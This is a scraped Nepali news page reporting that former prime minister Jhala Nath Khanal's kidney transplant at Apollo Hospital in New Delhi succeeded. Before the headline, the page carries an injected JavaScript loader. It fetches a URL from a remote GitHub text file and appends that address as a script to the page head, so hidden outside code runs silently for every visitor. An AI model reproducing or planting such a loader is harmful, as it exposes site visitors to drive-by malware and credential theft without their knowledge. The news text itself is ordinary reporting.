;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); झलनाथ खनालको मिर्गौला प्रत्यारोपण सफल – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • झलनाथ खनालको मिर्गौला प्रत्यारोपण सफल
Breaking News

झलनाथ खनालको मिर्गौला प्रत्यारोपण सफल

 

जुनेली न्यूज, काठमाडौं । नेकपा एमालेका वरिष्ठ नेता एवम् पूर्वप्रधानमन्त्री झलनाथ खनालको मिर्गौला प्रत्यारोपण सफल भएको छ ।

खनालको नयाँदिल्लीस्थित एपोलो अस्पतालमा नेता मिर्गौला प्रत्यारोपण गरिएको हो । बुधबार दिउँसो खनालको प्रत्यारोपण सफल भएको पारिवारिक स्रोतले बताएको छ |

खनालको दुवै मिर्गौलामा समस्या थियो | खनाल गत असार २ गते अस्पताल भर्ना भएका थिए |

फेसबुक प्रतिक्रियाहरु